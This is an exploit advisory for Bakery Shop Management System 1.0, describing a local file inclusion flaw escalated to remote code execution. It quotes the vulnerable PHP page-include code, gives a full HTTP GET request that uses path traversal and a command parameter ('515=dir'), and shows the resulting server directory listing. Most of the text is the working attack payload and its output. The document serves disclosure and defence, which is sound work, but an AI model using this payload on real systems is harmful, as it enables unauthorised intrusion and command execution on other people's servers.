Bakery Shop Management System version 1.0 suffers from a local file inclusion vulnerability.
406bbd551d30b93c453d0bbc92d5f4d1# Title: Bakery Shop Management System 1.0 LFI To RCE
# Author: Hejap Zairy
# Date: 06.04.2022
# Vendor: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/
# Software: https://www.campcodes.com/wp-content/uploads/2022/02/bsms_0.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache
#vulnerability Code php
Needs more filtering require_once
```
require_once('DBConnection.php');
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
if($_SESSION['type'] != 1 && in_array($page,array('maintenance','products','stocks'))){
header("Location:./");
exit;
}
```
[+] Payload GET
```
GET //bsms/?page=../../../0day&515=dir HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=ttdhr0ntd2dte05a2quob2kr3s
Upgrade-Insecure-Requests: 1
```
#Status: CRITICAL
#Response
```
<div class="container py-3" id="page-container">
Volume in drive C is OS
Volume Serial Number is 2EF1-9DCA
Directory of C:\xampp\htdocs\bsms
04/06/2022 04:18 AM <DIR> .
04/06/2022 05:05 AM <DIR> ..
02/14/2022 10:39 AM 16,358 Actions.php
08/04/2021 11:04 PM <DIR> css
02/14/2022 11:55 AM <DIR> database
09/09/2021 11:54 AM <DIR> DataTables
02/14/2022 11:55 AM 865 DBConnection.php
08/05/2021 03:09 AM <DIR> Font-Awesome-master
02/14/2022 12:00 PM 10,407 home.php
02/14/2022 11:07 AM <DIR> images
02/14/2022 02:26 PM 10,018 index.php
09/11/2021 11:40 AM <DIR> js
02/14/2022 11:11 AM 4,372 login.php
```
# Description:
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce
# Proof and Exploit:
https://i.imgur.com/qLNHh9Q.png
https://i.imgur.com/XDSsyNL.jpg